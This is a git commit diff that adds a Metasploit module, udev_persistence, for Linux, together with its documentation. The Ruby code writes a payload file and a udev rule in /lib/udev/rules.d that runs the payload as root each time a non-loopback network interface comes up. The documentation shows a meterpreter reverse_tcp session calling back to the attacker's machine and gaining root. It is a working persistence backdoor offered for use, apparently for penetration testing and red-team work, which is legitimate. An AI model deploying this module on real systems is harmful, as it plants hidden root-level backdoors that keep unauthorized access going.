Land rapid7#19472, adds exploits/linux/local/udev_persistence

msutovsky-r7 · web-flow · commit 5fbf46ba7f99 · 2025-06-04T13:21:04.000+02:00
Add modules/exploits/linux/local/udev_persistence.rb
diff --git a/documentation/modules/exploit/linux/local/udev_persistence.md b/documentation/modules/exploit/linux/local/udev_persistence.md
@@ -0,0 +1,43 @@
+This is a post module that performs a persistence installation on a Linux system using [udev](https://en.wikipedia.org/wiki/Udev).
+The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Obtain a session on the target machine
+  3. `use exploit/linux/local/udev_persistence`
+  4. `set session -1`
+  5. `exploit`
+
+## Module usage
+
+```
+msf6 payload(cmd/linux/http/x64/meterpreter/reverse_tcp) > use exploit/linux/local/udev_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/udev_persistence) > set session -1
+session => -1
+msf6 exploit(linux/local/udev_persistence) > exploit
+
+[*] /usr/bin/udev-check-updates written
+[*] /lib/udev/rules.d/99-update.rules written
+msf6 exploit(linux/local/udev_persistence) > 
+[*] Sending stage (3045380 bytes) to 172.18.49.39
+[*] Meterpreter session 2 opened (172.18.52.45:4444 -> 172.18.49.39:41848) at 2024-09-13 03:59:47 -0400
+msf6 exploit(linux/local/udev_persistence) > sessions -i -1
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
+
+## Options
+
+### BACKDOOR_PATH
+
+Specify the path of the file containing the udev rules. (Default: /lib/udev/rules.d/99-update.rules)
+
+### PAYLOAD_PATH
+
+Specify the name of the payload to execute upon persistence. (Default: /usr/bin/udev-check-updates)
+
diff --git a/modules/exploits/linux/local/udev_persistence.rb b/modules/exploits/linux/local/udev_persistence.rb
@@ -0,0 +1,100 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Post::Unix
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'udev persistence',
+        'Description' => %q{
+          This module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk.
+          It'll be executed with root privileges everytime a network interface other than l0 comes up.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Julien Voisin'
+        ],
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => ARCH_CMD,
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'DefaultOptions' => { 'WfsDelay' => 90_000 },
+        'Targets' => [ ['Automatic', {}] ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '1999-01-01',
+        'Passive' => true,
+        'Stance' => Msf::Exploit::Stance::Passive,
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [EVENT_DEPENDENT],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
+        },
+        'References' => [
+          ['URL', 'https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp'],
+          ['URL', 'https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/'],
+        ]
+      )
+    )
+    register_options([
+
+      OptString.new('PAYLOAD_PATH', [false, 'The payload\'s path on disk', '']),
+      OptString.new('BACKDOOR_PATH', [false, 'The backdoor\'s path on disk', ''])
+    ])
+  end
+
+  def get_command
+    unless executable? '/usr/bin/at'
+      fail_with Failure::BadConfig, 'The required /usr/bin/at binary was not found on the target'
+    end
+    %(/usr/bin/at -M -f #{@payload_path} now)
+  end
+
+  def exploit
+    @payload_path = datastore['PAYLOAD_PATH'].blank? ? '/usr/bin/' + Rex::Text.rand_text_alphanumeric(8) : datastore['PAYLOAD_PATH']
+
+    @backdoor_path = datastore['BACKDOOR_PATH'].blank? ? '/lib/udev/rules.d/' + Rex::Text.rand_text_alphanumeric(8) + '.rules' : datastore['BACKDOOR_PATH']
+
+    unless writable? File.dirname(@backdoor_path)
+      fail_with Failure::BadConfig, "#{@backdoor_path} is not writable"
+    end
+
+    if exists? @backdoor_path
+      fail_with Failure::BadConfig, "#{@backdoor_path} is already present"
+    end
+
+    unless writable? File.dirname(@payload_path)
+      fail_with Failure::BadConfig, "#{@payload_path} is not writable"
+    end
+
+    if exists? @payload_path
+      fail_with Failure::BadConfig, "#{@payload_path} is already present"
+    end
+
+    upload_and_chmodx(@payload_path, "#!/bin/sh\n#{payload.encoded}")
+    print_status "#{@payload_path} written"
+
+    fail_with Failure::PayloadFailed, 'Failed to write UDEV file' unless write_file(@backdoor_path, %(SUBSYSTEM=="net", KERNEL!="lo", RUN+="#{get_command}"))
+
+    print_status "#{@backdoor_path} written"
+
+    # need to trigger first rule manually
+    print_status 'Triggering udev rule'
+    cmd_exec('udevadm trigger -v --subsystem-match=net')
+
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
+
+      Rex::ThreadSafe.sleep(1)
+    end
+  end
+end
